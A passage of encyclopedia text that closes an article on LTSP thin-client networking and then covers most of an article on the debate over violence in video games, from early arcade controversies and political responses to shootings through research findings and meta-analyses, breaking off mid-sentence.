d'Infrastructure Logiciel Libre en Éducation (Free Software Infrastructure Model for Education) and is targeted at educational institutions. As of 2009, MILLE-Xterm was integrated back into the LTSP as LTSP-cluster, a project specializing in the large scale deployment of LTSP. One of the main differences between LTSP and LTSP-cluster is the integration of a web-based central control center that replaces the traditional "one configuration file per thin client" as is the method of client customization through LTSP's lts.conf file in the main LTSP. LTSP-cluster allows organizations to centrally manage thousands of thin clients and their parameters from a central location. In LTSP-cluster high-availability and high-performance thin-clients are specified through the optional use of redundant components. Services that can be load-balanced and made highly available are: DHCP server TFTP server Boot servers (root filesystem for the thin clients) Application servers Control center (PostgreSQL database + web frontend) LTSP-Cluster can support Linux application servers as well as Windows application servers and provides a similar level of support, centralized management, high-availability, and load-balancing features for both platforms. Also included is support for virtual desktops for remote users using NX technology. The NX protocol can allow remote Windows and Linux sessions to be accessed from a web browser with very low bandwidth (40 kbit/s) requirements and tolerance for high-latency connections. The NX client runs on various operating systems including Linux, Mac, and Windows. Fat clients LTSP v5.x added support for a thin client type known as "fat clients". With the advent of inexpensive, relatively powerful computer hardware, the idea to run applications locally on the thin client while offering the manageability of a thin client solution became a reality. In the case of a LTSP fat client, the root filesystem is not a rudimentary chroot but a full Linux installation as a chroot. The fat client uses LDM to authenticate to the LTSP server and mounts user home directories using SSH and FUSE. The local CPU and RAM is used on the fat clients, which provides a few benefits. the LTSP server does not suffer from users abusing resources and affecting the performance and availability of the LTSP server to other users multimedia and 3D applications perform better and utilize less network bandwidth LTSP is unique in offering the ability for a computer to mount its root filesystem over a network and run applications locally. On the Windows platform, the closest equivalent solution is to use a technology like Intel vPro to run a client-side hypervisor and mount the root filesystem image using iSCSI. See also Diskless Remote Boot in Linux: similar booting system to LTSP fat clients Multiseat configuration RULE Project Sun Ray Time-sharing VT100 Windows MultiPoint Server References External links LTSP Cluster official website Linux Servers (computing) Remote desktop X Window System Thin clients
40357187
https://en.wikipedia.org/wiki/Violence%20and%20video%20games
Violence and video games
Since their inception in the 1970s, video games have often been criticized for violent content. Politicians, parents, and other activists have claimed that violence in video games can be tied to violent behavior, particularly in children, and have sought ways to regulate the sale of video games. Numerous studies have shown no connection between video games and violent behavior; the American Psychological Association state there is little to no evidence connecting violence to video games, though do state there is an increase in aggression that can result from playing violent video games. Background The Entertainment Software Association reports that 17% of video game players are boys under the age of eighteen and that 36% are women over the age of eighteen, with 48% of all gamers being women of all ages. They also report that the average age of gamers is 31. A survey of 1,102 children between 12 and 17 years of age found that 97% are video game players who have played in the last day and that 75% of parents checked the censor's rating on a video game before allowing their child to purchase it. Of these children, 14% of girls and 50% of boys favored games with an "M" (mature) or "AO" (adult-only) rating. 64% of American adults and 70% of those under 18 play video games regularly as of 2020. Since the late 1990s, some real-world acts of violence have been highly publicized in relation to beliefs that the suspect in the crime may have had a history of playing violent video games. The 1999 Columbine High School massacre created a moral panic around video games, spurring research to see if violent video games lead to aggressive behaviors in real life. Some research finds that violent video game use is correlated with, and may cause, increases in aggression and decreases in prosocial behavior. Other research argues that there are no such effects of violent video games. This link between violent video games and antisocial behaviour was denied by the president of the Interactive Digital Software Association in 2005 in a PBS interview. In the interview, he stated that the problem is “…vastly overblown and overstated…” by people who “….don’t understand, frankly, this industry”. Others have theorised that there are positive effects of playing video games, including prosocial behavior in some contexts, and argue that the video game industry has been used as a scapegoat for more generalised problems affecting some communities. History Before video games Elements of the type of moral panic that came with video games after they gained popularity had previously been seen with comic books. Through the 1950s, comics were in their Golden Age, having become a widely popular form of media. As the media expanded, some artists and publishers took more risks with violent and otherwise questionable content. Fredric Wertham, a psychiatrist, wrote Seduction of the Innocent in 1954, which outlined his studies asserting that violent comics were a negative form of literature and led to juvenile delinquency. Even though some of Wertham's claims were later found to be based on bad studies, the book created a moral panic that put pressure on the comic book industry to regulate their works. Later in 1954, the comic industry issued the Comics Code Authority (CCA) which put strict regulations on content that could appear in comic books sold at most stores, eliminating most violence and other mature content via self-censoring. The mainstream comic industries waned as comics had lost their edge, while an underground market for the more adult comics formed. The comic industry did not recover from Comics Code Authority regulations until the 1970s, when adherence to the Authority was weakened. By the 2000s, the Authority was generally no longer considered. Modern trends of targeting violence in video games have been compared to these events in the comic industry, and video game industry leaders have specifically avoided the use of self-censorship that could impact the performance of the industry. Pinball machines had also created a moral panic in post-World War II America, as the teenage rebels of the 1950s and 1960s would frequently hang around establishments with pinball machines, which created fear across the generation gap of older Americans unsure of the intents of this younger crowd. To some, it appeared to be a form of gambling (which led to machines being labeled "For Amusement Only"), while more religious people feared pinball was a "tool of the devil". Because of this, many cities and towns banned pinball machines or implemented strict licensing requirements which were slowly lifted in the late 1960s and early 1970s. Notably, New York City's ban on pinball machines lasted until 1976, while Chicago's was lifted in 1977. The appearance of video games in the early 1970s overlapped with the lifting of bans on pinball machines, and when youth were drawn to arcade games, the same concerns that were initially leveled at pinball machines as gambling machines and immoral playthings were also made about video games. 1970s–1980s After Pong exploded onto the arcade game market, arcade game manufacturers were aware of the attention that video games were getting and tried to position games as entertainment aimed at adults, selling units preferably to bars and lounges. This gave them more leeway with content, but still which drew criticism from some. Two arcade games had already drawn attention for amoral content prior to 1976. Atari's Gotcha in 1973, a maze game, initially shipped with two joystick units that were covered in pink domes as to represent women's breasts, but which were removed in later makes. The 1975 Shark Jaws, also by Atari, was an unlicensed adaption of the film Jaws and attempted to play on the film's violent context, though here, the player was hunted by the shark. As arcade games spread into more locations, the ease for children to access the games also elevated concerns about their potential impacts. The 1976 arcade game Death Race is considered the first game to be targeted for its violent content. The game, like Shark Jaws, was an unlicensed adaption of the 1975 film Death Race 2000, a violent film centered on driving. Within the game, the player was challenged to drive a car and run over simulated gremlins scoring points for doing so. Besides the game's simulated content, the game cabinet was also adorned with imagery of death. The game caught the attention of an Associated Press writer, Wendy Walker, who had contacted the game's manufacturer, Exidy, with her concerns that the game was excessively violent. Walker's concerns spread through other media organizations, including the National Safety Council, who accused the game of glorifying the act of running people over when at the time they were trying to educate drivers about safe driving practices. While some arcades subsequently returned the Death Race machines due to this panic, sales of the game continued to grow due to the media coverage. It was recognized that many other competing arcade games at the time, like Cops 'n' Robbers, Tank 8, and Jet Fighter, all games equally about violent actions, saw little complaint. Nolan Bushnell of Atari said that "We [Atari] had an internal rule that we wouldn't allow violence against people. You could blow up a tank or you could blow up a flying saucer, but you couldn't blow up people. We felt that that was not good form, and we adhered to that all during my tenure." United States Surgeon General C. Everett Koop was one of the first to raise concerns about the potential connection of video games to youth behavior. In 1982, Koop stated as a personal observation that "more and more people are beginning to understand" the connection between video games and mental and physical health effects on youth, though that at that time, there was not sufficient evidence to make any conclusion. 1990s Mortal Kombat and congressional hearings (1993–1994) The fighting game Mortal Kombat was released into arcades in 1992. It was one of the first games to depict a large amount of blood and gore, particularly during special moves known as "Fatalities" used to finish off the losing character. Numerous arcade games that used high amounts of violent content followed in Mortal Kombat wake. However, as these games were originally exclusive to arcade machines, it was generally possible to segregate them away from games aimed for younger players. Eventually, there was significant interest from home console manufacturers in licensing Mortal Kombat from Midway Games, particularly from Sega for its Sega Genesis platform and Nintendo for the Super Nintendo Entertainment System. At the time, Sega and Nintendo were in the midst of a console war to try to gain dominance in the United States market. Sega's licensed version of Mortal Kombat retained all the gore from the arcade version (though required a use of a cheat code to activate it), while Nintendo had a version developed that removed most of the gore, recoloring the blood as grey "sweat" and otherwise toning down the game. Sega's version drastically outsold Nintendo's version and intensified the competition between the two companies. The popularity of Mortal Kombat, along with the full-motion video game Night Trap and the light gun shooting game Lethal Enforcers, gained attention from U.S. Senators Joe Lieberman and Herb Kohl. This resulted in two congressional hearings in 1993 and 1994 to discuss the issues of violence and video games with concerned advocacy groups, academics, and the video game industry. Sega, Nintendo, and others were criticized for lacking a standardized content rating system, and Lieberman threatened to have Congress pass legislation requiring a system that would have government oversight if the industry did not take its own steps. By the time of the second hearing, Sega, Nintendo, and other console manufacturers had outlined their agreed-upon approach for a voluntary rating system through the Entertainment Software Ratings Board (ESRB), which was in place by the end of 1994. This also led to the establishment of the Interactive Digital Software Association, later known as the Entertainment Software Association (ESA), a trade group for the video game industry that managed the ESRB and further supported trade-wide aspects such as government affairs. Jack Thompson lawsuits (1997) American attorney Jack Thompson has criticized a number of video games for perceived obscenity and campaigned against their producers and distributors. He argues that violent video games have repeatedly been used by teenagers as "murder simulators" to rehearse violent plans. He has pointed to alleged connections between such games and a number of school massacres. Columbine High School massacre (1999) The Columbine High School massacre on April 20, 1999, reignited the debate about violence in video games. Among other factors, the perpetrators were found to be avid players of violent games like Doom. The public perceived a connection between video games and the shooting, leading to a Congressional hearing and President Bill Clinton ordering an investigation into school shootings and how video games were being marketed to youth. The report, released in 2004 by the United States Secret Service and the United States Department of Education, found only 12% of perpetrators in school shootings had shown interest in video games. In the aftermath of the Columbine shooting, previous school shootings were re-evaluated by media and connections were drawn between Columbine and the Westside Middle School massacre of 1998. Although video games had not been identified as a factor at the time of the Westside shooting, media discussions of Columbine pointed to Westside as a similar case in that the two student perpetrators had often played GoldenEye 007 together and had enjoyed playing first-person shooter games prior to the shooting. 2000s Grand Theft Auto III and further lawsuits In 2001, Rockstar Games released the PlayStation 2 game Grand Theft Auto III. The game gave the player control of an unnamed protagonist in a contemporary urban setting taking on missions within the city's criminal underworld. The game was one of the first open world games and allowed the player to have nearly free control of how they completed missions, which included gunplay, melee combat, and reckless driving. The game was widely successful, selling over two million units within six months. Its popularity led several groups to criticize the violence in the game, among other factors. Rockstar subsequently released two follow-up games, Grand Theft Auto: Vice City in 2003 and Grand Theft Auto: San Andreas in 2004, the latter becoming controversial for the sexually explicit Hot Coffee mod. After this incident the government decided to take action. In 2005, California banned the sale of violent video games to minors. In the years that followed, a number of fatal murders and other crimes committed by young adults and youth were found to have ties to Grand Theft Auto III and later games that followed in its footsteps. Jack Thompson became involved to try to sue Rockstar, its publisher Take-Two Interactive, and Sony on behalf of the victims for large amounts of damages, asserting that the violence in these games led directly to the crimes and thus these companies were responsible for said crimes. These cases ultimately did not lead to any action against Rockstar, as they were either voluntarily withdrawn or dismissed before judgment. Thompson agreed to no longer seek legal action against Take-Two's games, and ultimately became an activist to highlight the issues of violence in video games. The events of this period were made into a BBC docudrama, The Gamechangers, which was first broadcast in September 2015. Winnenden school shooting (2009) The shooter in the Winnenden school shooting on March 11, 2009, in Winnenden, Germany, was found to have had interest in video games like Counter-Strike and Far Cry 2. In the weeks that followed, politicians and concerned citizens tried to pressure the government into passing legislation to ban the sale of violent video games in the country, though this never came to pass. Call of Duty: Modern Warfare 2 "No Russian" (2009) The 2009 first-person shooter Call of Duty: Modern Warfare 2 included a controversial mission in its story mode called "No Russian". In the mission, the player takes on the role of a CIA agent who has embedded himself among a Russian ultranationalist terrorist group; the leader of the group warns them to speak "no Russian" to give away their origins. The mission allows the player to participate in a terrorist attack at a Moscow airport, during which they may fire indiscriminately on civilians and security alike. Participation in the mission is not mandatory: a disclaimer before the mission begins warns the player about the violent content and gives the option to skip the level. If the player chooses to play the level, they are not required to participate in the shooting in order to complete the level. The level ends when the terrorist group's leader kills the player-character in order to frame the attack as the work of the United States, leading to a world war. The existence of the level leaked before the game's release, forcing publisher Activision and developer Infinity Ward to respond to journalists and activists that were critical of the concept of the mission. Activision defended the level's inclusion in the finished game, emphasizing that the mission was not representative of the rest of the game and that initial assessments had taken the level out of context. Even with the full game's release, "No Russian" was still criticized, with some stating that video games had yet to mature. The mission is considered a watershed moment for the video game industry, in how certain depictions of violence can be seen as acceptable while others, like "No Russian", are considered unacceptable. 2010s Brown v. Entertainment Merchants Association (2011) To address violent video games, several U.S. states passed laws that restricted the sale of mature video games, particularly those with violent or sexual content, to children. Video game industry groups fought these laws in courts and won. The most significant case came out of a challenge to a California law passed in 2005 that banned the sale of mature games to minors as well as requiring an enhanced content rating system beyond the ESRB's. Industry groups fought this and won, but the case ultimately made it to the Supreme Court of the United States. In Brown v. Entertainment Merchants Association, the Supreme Court ruled that video games were a protected form of speech, qualifying for First Amendment protections, and laws like California's that block sales on a basis outside of the Miller test were unconstitutional. Justice Antonin Scalia, who wrote the majority opinion, considered that violence in many video games was no different from that presented in other children's media, such as Grimm's Fairy Tales. Sandy Hook Elementary School shooting (2012) The Sandy Hook Elementary School shooting occurred on December 14, 2012. The perpetrator, Adam Lanza, was found to have a "trove" of video games, as described by investigating officials, including several games considered to be violent. This discovery started a fresh round of calls against violent video games in political and media circles, including a meeting on the topic between U.S. Vice President Joe Biden and representatives from the video game industry. The National Rifle Association accused the video game industry for the shooting, identifying games that focused on shooting people in schools. Munich Olympia Mall shooting (2016) The 2016 Munich shooting occurred on July 22, 2016, in the vicinity of the Olympia Shopping Mall in the Moosach District of Munich, Bavaria, Germany. The perpetrator, David Sonboly, killed 10 people before killing himself when surrounded by police. As a result, the German Minister of the Interior, Thomas de Maizière, claimed that the "intolerable extent of video games on the internet" has a harmful effect on the development of young people. His statements were criticized by media specialist Maic Mausch, who said with regards to Maiziere's statement that "No sensible scientist can say that with such certainty. And if no scientist can do it, no minister can do that." Parkland school shooting (2018) The Stoneman Douglas High School shooting occurred on February 14, 2018, in Parkland, Florida. In the aftermath, Kentucky Governor Matt Bevin declared that the country should re-evaluate "the things being put in the hands of our young people", specifically "quote-unquote video games" that "have desensitized people to the value of human life". A month later, President Donald Trump called for several industry representatives and advocates to meet in Washington, D.C. to discuss the impact of violent video games with him and his advisors. Industry leaders included Michael Gallagher, ESA president; Patricia Vance, ESRB president; Robert Altman, CEO of ZeniMax Media; and Strauss Zelnick, CEO of Take-Two, while advocates included Brent Bozell, of the Media Research Center and Melissa Henson of the Parents Television Council. While the video game industry asserted the lack of connection between violent video games and violent acts, their critics asserted that the industry should take steps to limit youth access and marketing to violent video games in ways similar to the approaches taken for alcohol and tobacco use. Suzano school shooting (2019) The Suzano school shooting occurred on March 13, 2019, at the Professor Raul Brasil State School in the Brazilian municipality of Suzano, São Paulo. The perpetrators, Guilherme Taucci Monteiro and Luiz Henrique de Castro, managed to kill five school students and two school employees before Monteiro killed Castro and then committed suicide. As a result, Brazilian Vice President Hamilton Mourão claimed that young people are addicted to violent video games, while also claiming that the work routine of Brazilian parents made it harder for young people to be raised properly. As a result, the hashtag #SomosGamersNãoAssassinos (“#WeAreGamersNotMurderers”) gained popularity in Brazil. August 2019 shootings Two mass shootings occurring within a day of each other, one in El Paso, Texas and another in Dayton, Ohio, in August 2019 provoked political claims that video games were partially to blame for the incidents. U.S. President Donald Trump stated days after the shootings, "We must stop the glorification of violence in our society. This includes the gruesome and grisly video games that are now commonplace". House Minority Leader Kevin McCarthy also blamed video games for these events, stating, "I've always felt that it’s a problem for future generations and others. We've watched from studies, shown before, what it does to individuals, and you look at these photos of how it took place, you can see the actions within video games and others." News organizations and the video game industry reiterated the findings of the past, that there was no link between video games and violent behavior, and criticized politicians for putting video games to task when the issues lied within proper gun control. Halle synagogue shooting (2019) The Halle synagogue shooting occurred on October 9, 2019, in Halle, Saxony-Anhalt, Germany, continuing in nearby Landsberg. The suspect, identified by the media as Stephan Baillet, was influenced by far-right ideology and managed to live-stream his attack on Facebook and Twitch. In the process of the attack, he managed to kill two people before being subdued by police. Given the live-streamed nature of the attack, German Minister of the Interior Horst Seehofer claimed that "many of the perpetrators or the potential perpetrators come from the gaming scene" with regards to incidents like the shooting in Halle. His comments received widespread criticism from German gamers and politicians, such as SPD general secretary Lars Klingbeil, who stated that "The problem is right-wing extremism, not gamers or anything else." 2020s School shooting in Torreon, Mexico (2020) Hours after a school shooting in Torreón, Coahuila, Mexico, in January 2020, the governor of that state, Miguel Ángel Riquelme Solís, stated that the 11-year-old shooter was wearing a T-shirt with the legend Natural Selection and could have been influenced by the game. The governor's comment sparked a debate about the link between violence and video games. Erik Salazar Flores of the College of Psychology of the National Autonomous University of Mexico (UNAM) stated that blaming video games for violence is an "easy way out" for authorities who wish to ignore the complexity of the problem. Dalila Valenzuela, a sociologist from Autonomous University of Baja California said that video games influence children's behavior but that the parents are most directly responsible. Studies Broadly, researchers have not found any connection between violent video games and violent behavior. The policy statement of the American Psychological Association (APA) related to video games states "Scant evidence has emerged that makes any causal or correlational connection between playing violent video games and actually committing violent activities." The APA has acknowledged that video games may lead to aggressive behavior, as well as anti-social behavior, but clarifies that not all aggressive behavior is necessarily violent. A 2015 APA review of current studies in this area led the APA to conclude that violent video games led to aggressive behavior, "manifested both as an increase in negative outcomes such as aggressive behavior, cognition, and affect and as a decrease in positive outcomes such as prosocial behavior, empathy, and sensitivity to aggression." However, the APA recognized the studies tended to be disproportionate to normal demographics. In a 2015 Resolution on Violent Video Games, the APA has vowed towards furthering research to better understand the connection between violent video games to aggression, and how aggressive activities may lead to violent actions, as well as to promote education towards politicians and media with their findings. Further, the APA issued a policy statement in 2017 aimed at politicians and media to urge them to avoid linking violent video games with violent crimes, reiterating the subject of their findings over the years. In a follow-up statement in 2020, the APA reaffirmed that there remains insufficient evidence to link video games to violent behavior. They had found that there was "small, reliable association between violent video game use and aggressive outcomes, such as yelling and pushing", but could not extend that to more violent activities. Christopher Ferguson, a professor at Stetson University and a member of the APA, has researched the connection between violent video games and violent behavior for years. Through longitudinal studies, he has concluded that "[t]here’s not evidence of a correlation, let alone a causation" between video games and violence. Ferguson's more recent studies have shown that there is no predictive behavior that can be inferred from the playing of violent video games. Negative effects of video games Theories of negative effects of video games tend to focus on players' modeling of behaviors observed in the game. These effects may be exacerbated due to the interactive nature of these games. The most well-known theory of such effects is the General Aggression Model (GAM), which proposes that playing violent video games may create cognitive scripts of aggression which will be activated in incidents in which individuals think others are acting with hostility. Playing violent video games, thus, becomes an opportunity to rehearse acts of aggression, which then become more common in real life. The general aggression model suggests the simulated violence of video games may influence a player's thoughts, feelings and physical arousal, affecting individuals' interpretation of others' behavior and increasing their own aggressive behavior. Some scholars have criticized the general aggression model, arguing that the model wrongly assumes that aggression is primarily learned and that the brain does not distinguish reality from fiction. Some recent studies have explicitly claimed to find evidence against the GAM. Parents can protect their children from violence used in video games by limiting game usage and privileges. Some biological theories of aggression have specifically excluded video game and other media effects because the evidence for such effects is considered weak and the impact too distant. For example, the catalyst model of aggression comes from a diathesis-stress perspective, implying that aggression is due to a combination of genetic risk and environmental strain. The catalyst model suggests that stress, coupled with antisocial personality are salient factors leading to aggression. It does allow that proximal influences such as family or peers may alter aggressiveness but not media and games. Research methods Research has focused on two elements of the effects of video games on players: the player's health measures and educational achievements as a function of game play amounts; the players' behavior or perceptions as a function of the game's violence levels; the context of the game play in terms of group dynamics; the game's structure which affects players' visual attention or three dimensional constructional skills; and the mechanics of the game which affects hand–eye coordination. Two other research methods that have been used are experimental (in a laboratory), where the different environmental factors can be controlled, and non-experimental, where those who participate in studies simply log their video gaming hours. Scientific debate A common theory is that playing violent video games increases aggression in young people. Various studies claim to support this hypothesis. Other studies find no link. Debate among scholars on both sides remains contentious, and there is argument about whether consensus exists regarding the effects of violent video games on aggression. Primary studies In 1998, Steven Kirsh reported in the journal Childhood that the use of video games may lead to acquisition of a hostile attribution bias. Fifty-five subjects were randomized to play either violent or non-violent video games. Subjects were later asked to read stories in which the characters' behaviour was ambiguous. Participants randomized to play violent video games were more likely to provide negative interpretations of the stories. Another study done by Anderson and Dill in 2000 found a correlation in undergraduate students between playing violent video games and violent crime, with the correlation stronger in aggressive male players, although other scholars have suggested that results from this study were not consistent, and that the methodology was flawed. In 2001, David Satcher, the Surgeon General of the United States, said "We clearly associate media violence to aggressive behavior. But the impact was very small compared to other things. Some may not be happy with that, but that's where the science is." A 2002 US Secret Service study of 41 individuals who had been involved in school shootings found that twelve percent were attracted to violent video games, twenty-four percent read violent books and twenty-seven percent were attracted to violent films. Some scholars have indicated that these numbers are unusually low compared to violent media consumption among non-criminal youth. In 2003, a study was conducted at Iowa State University assessing pre-existing attitudes and violence in children. The study concerned children between ages 5 and 12 that were assessed for the typical amount of time they played video games per week and pre-existing empathy and attitudes towards violence. The children played a violent or non-violent video game for approximately 15 minutes. Afterwards, their pulse rates were recorded, and the children were asked how frustrating the games were on a 1-10 scale. Last, the children are given drawings (vignettes) of everyday situations, some more likely to have aggressive actions following the depiction, while others an empathetic action. Results show that there were no significant effects of video game playing in the short term, with violent video games and non-violent video games having no significant differences, indicating that children do not have decreased empathy from playing violent video games. Conversely, children who play more violent video games over a long period of time were associated with lower pre-existing empathy, and also lower scores on the empathy inducing vignettes, indicating long-term effects. It is possible that video games had not primed children for the particular aggression scenarios. This data could indicate desensitization in children can occur after long-term exposure, but not all children were affected in the same way, so the researchers deduced that some children may be at a higher risk of these negative effects. It is possible that fifteen minutes is not quite long enough to produce short-term cognitive effects. In 2003, Jeanne B. Funk and her colleagues at the Department of Psychology at the University of Toledo examined the relationship between exposure to violence through media and real-life, and desensitization (reflected by loss of empathy and changes in attitudes toward violence) in fourth and fifth grade pupils. Funk found that exposure to video game violence was associated with lowered empathy and stronger proviolence attitudes. Another study from 2003, by John Colwell at the University of Westminster, found that violent video game playing was associated with reduced aggression among Japanese youth. The American Psychological Association (APA) released an official statement in 2005, which said that exposure to violent media increases feelings of hostility, thoughts about aggression, suspicions about the motives of others, and demonstrates violence as a method to deal with potential conflict situations, that comprehensive analysis of violent interactive video game research suggests such exposure increases aggressive behavior, thoughts, angry feelings, physiological arousal, and decreases helpful behavior, and that studies suggest that sexualized violence in the media has been linked to increases in violence towards women, rape myth acceptance and anti-women attitudes. It also states that the APA advocates reduction of all violence in videogames and interactive media marketed to children and youth, that research should be made regarding the role of social learning, sexism, negative depiction of minorities, and gender on the effects of violence in video games and interactive media on children, adolescents, and young adults, and that it engages those responsible for developing violent video games and interactive media in addressing the issue that playing violent video games may increase aggressive thoughts and aggressive behaviors in children, youth, and young adults, and that these effects may be greater than the well documented effects of exposure to violent television and movies. They also recommend to the entertainment industry that the depiction of the consequences of violent behavior be associated with negative social consequences and that they support a rating system which accurately reflects the content of video games and interactive media. The statement was updated in 2015 (see below.) Some scholars suggested that the APA's policy statement ignored discrepant research and misrepresented the scientific literature. In 2013 a group of over 230 media scholars wrote an open letter to the APA asking them to revisit and greatly amend their policy statement on video game violence, due to considering the evidence to be mixed. Signatories to the 2013 letter included psychologists Jeffrey Arnett, Randy Borum, David Buss, David Canter, Lorenza Colzato, M. Brent Donnellan, Dorothy Espelage, Frank Farley, Christopher Ferguson, Peter Gray, Mark D. Griffiths, Jessica Hammer, Mizuko Ito, James C. Kaufman, Dana Klisanin, Catherine McBride-Chang, Jean Mercer, Hal Pashler, Steven Pinker, Richard M. Ryan, Todd K. Shackelford, Daniel Simons, Ian Spence, and Dean Simonton, criminologists Kevin Beaver, James Alan Fox, Roger J.R. Levesque, and Mike A. Males, game design researchers Bob De Schutter and Kurt Squire, communications scholar Thorsten Quandt, and science writer Richard Rhodes. In 2005, a study by Bruce D. Bartholow and colleagues at the University of Missouri, University of Michigan, Vrije Universiteit, and University of North Carolina using event related potential linked video game violence exposure to brain processes hypothetically reflecting desensitization. The authors suggested that chronic exposure to violent video games have lasting harmful effects on brain function and behavior. In 2005, a study at Iowa State University, the University of Michigan, and Vrije Universiteit by Nicholas L. Carnagey and colleagues found that participants who had previously played a violent video game had lower heart rate and galvanic skin response while viewing filmed real violence, demonstrating a physiological desensitization to violence. In 2007, a study at the Swinburne University of Technology found that children had variable reactions to violent games, with some kids becoming more aggressive, some becoming less aggressive, but the majority showing no changes in behavior. In 2008, a longitudinal study conducted in Japan assessed possible long-term effects of video game playing in children. The final analysis consisted of 591 fifth graders aged 10–11 across eight public elementary schools, and was conducted over the course of a year. Initially, children were asked to complete a survey which assessed presence or absence of violence in the children's favorite video games, as well as video game context variables that may affect the results and the aggression levels of the children. Children were assessed again for these variables a year later. Results reveal that there is a significant difference in gender, with boys showing significantly more aggressive behavior and anger than girls, which was attributed by the authors to boys elevated interest in violent video games. However the interaction between time spent gaming and preference for violent games was associated with reduced aggression in boys but not girls. The researchers also found that eight context variables they assessed increased aggression, including unjustified violence, availability of weapons, and rewards. Three context variables, role-playing, extent of violence, and humor, were associated with decreased aggression. It is unknown if the observed changes from the two surveys are actually contextual effects. The researchers found that the context and quality of the violence in video games affects children more than simply presence and amount of violence, and these effects are different from child to child. In 2008 the Pew Internet and American Life Project statistically examined the impact of video gaming on youths' social and communal behaviors. Teens who had communal gaming experiences reported much higher levels of civic and political engagement than teens who had not had these kinds of experiences. Youth who took part in social interaction related to the game, such as commenting on websites or contributing to discussion boards, were more engaged communally and politically. Among teens who play games, 63% reported seeing or hearing "people being mean and overly aggressive while playing," 49% reported seeing or hearing "people being hateful, racist or sexist while playing", and 78% reported witnessing "people being generous or helpful while playing". In 2009, a report of three studies conducted among students of different age groups in Singapore, Japan, and the United States, found that prosocial mostly nonviolent games increased helpful prosocial behaviour among the participants. In 2010, Patrick and Charlotte Markey suggested that violent video games only caused aggressive feelings in individuals who had a preexisting disposition, such as high neuroticism, low agreeableness, or low conscientiousness. In 2010, after a review of the effects of violent video games, the Attorney General's Office of Australia reported that even though the Anderson meta-analysis of 2010 was the pinnacle of the scientific debate at that time, significant harm from violent video games had not been persuasively proven or disproven, except that there was some consensus that they might be harmful to people with aggressive or psychotic personality traits. The attorney general considered a number of issues including: Social and political controversy about the topic. Lack of consensus about definitions and measures of aggression and violent video games (for example, whether a cartoon game has the same impact as a realistic one). Levels of aggression may or may not be an accurate marker for the likelihood of violent behaviour. The playing of violent video games may not be an independent variable in determining violent acts (for example, violent behaviour after playing violent video games may be age dependant, or players of violent video games may watch other violent media). Studies may not have been long or large enough to provide clear conclusions. In 2010, researchers Paul Adachi and Teena Willoughby at Brock University critiqued experimental video game studies on both sides of the debate, noting that experimental studies often confounded violent content with other variables such as competitiveness. In a follow up study, the authors found that competitiveness but not violent content was associated with aggression. In 2011, a thirty-year study of 14,000 college students, published by the University of Michigan which measured overall empathy levels in students, found that these had dropped by 40% since the 1980s. The biggest drop came after the year 2000, which the authors speculated was due to multiple factors, including increased societal emphasis on selfishness, changes in parenting practices, increased isolation due to time spent with information technology, and greater immersion in all forms of violent and/or narcissistic media including, but not limited to, news, television and video games. The authors did not provide data on media effects, but referenced various research of the topics. In 2011, in a longitudinal study of youth in Germany, von Salisch found that aggressive children tend to select more violent video games. This study found no evidence that violent games caused aggression in minors. The author speculated that other studies may have been affected by "single responder bias" due to self-reporting of aggression rather than reporting by parents or teachers. In 2012 a Swedish study examined the cooperative behavior of players in The Lord of the Rings Online. The authors argued that attempts to link collaborative or aggressive behavior within the game to real life behavior would rely on unwarranted assumptions regarding equivalencies of forms of cooperation and the material conditions of the environment in-game and out-of-game. One study from Morgan Tear and Mark Nielsen in 2013 concluded that violent video games did not reduce or increase prosocial behavior, failing to replicated previous studies in this area. In 2013, Isabela Granic and colleagues at Radboud University Nijmegen, the Netherlands, argued that even violent video games may promote learning, health, and social skills, but that not enough games had been developed to treat mental health problems. Granic et al. noted that both camps have valid points, and a more balanced perspective and complex picture is necessary. In 2014, Ferguson and Olson found no correlation between video game violence and bullying or delinquency in children with preexisting attention deficit disorder or depressive symptoms. In 2014, Villanova professor Patrick M. Markey conducted a study with 118 teenagers suggesting that video games have no influence on increased aggression of users; however, he did find that when used for the right amount of time (roughly 1 hour) video games can make children nicer and more socially interactive. This information was provided by the teens teachers at their local schools. A 2014 study by Andrew Przybylski at Oxford University examined the impact of violent content and frustration on hostility among video game players. In a series of experiments, Przybylski and colleagues demonstrated that frustration, but not violent content, increased player hostility. The authors also demonstrated that some previous "classic" violent video game experiments were difficult to replicate. One longitudinal study from 2014 suggested that violent video games were associated with very small increases in risk taking behavior over time. In 2015, the American Psychological Association released a review that found that violent video games caused aggressive behavior, with Mark Appelbaum, the chair of the task force that conducted the review, saying that "the link between violence in video games and increased aggression in players is one of the most studied and best established in the field." However, Appelbaum also characterized the size of the correlation as "not very big". The same review found insufficient evidence of a link between such video games and crime or delinquency. Critics, including Peter Gray and Christopher Ferguson, expressed concerns about methodological limitations of the review. Ferguson stated that "I think (the task force members) were selected because their opinions were pretty clear going in." At least four of the seven task force members had previously expressed opinions on the topic; critics argued this alone constitutes a conflict of interest, while a task force member defended that "If it were common practice to exclude all scientists after they render one conclusion, the field would be void of qualified experts". A 2015 study examined the impact of violent video games on young adults players with autism spectrum disorders (ASD). The study found no evidence for an impact of playing such games on aggression among ASD players. These results appeared to contradict concerns following the 2012 Sandy Hook shooting, that individuals with ASD or other mental conditions might be particularly susceptible to violent video game effects. One study from 2016 suggested that "sexist" games (using games from the Grand Theft Auto series as exemplars) may reduce empathy toward women. Although no direct game effect was found, the authors argued that an interaction between game condition, masculine role norms, gender and avatar identification produced enough evidence to claim causal effects. Comments by other scholars on this study reflect some concerns over the methodology including a possible failure of the randomization to game conditions (see comments tab). In 2016, a preregistered study of violent video game effects concluded that violent video games did not influence aggression in players. The preregistered nature of the study removed the potential for the scholars to "nudge" the results of the study in favor of the hypothesis and suggests that preregistration of future studies may help clarify results in the field. Meta-analyses Because the results of individual studies have often reached different conclusions, debate has often shifted to the use of meta-analysis. This method attempts to average across individual studies, determine whether there is some effect on average, and test possible explanations for differences between study results. A number of meta-analyses have been conducted, at times reaching different conclusions. A 2001 meta-analysis reviewing the relationship between video game violence and aggression in teenagers (n = 3,033) found a significant and positive correlation, indicating that high video game violence does lead to greater aggression among teenagers. Another meta-analysis conducted the same year by John Sherry was more skeptical of effects, specifically questioning whether the interactivity of video games made them have more effect than other media. Sherry later published another meta-analysis in 2007, again concluding that the influence of video game violence on aggression was minimal. Sherry also criticized the observed dose-response curve, reporting that smaller effects were found in experimental studies with longer exposure times, where one might expect greater exposure to cause greater effects. In 2010, Anderson's group published a meta-analysis of one hundred and thirty international studies with over 130,000 participants. He reported that exposure to violent video games caused both short-term and long-term aggression in players and decreased empathy and pro-social behavior. However, other scholars criticized this meta-analysis for excluding non-significant studies and for 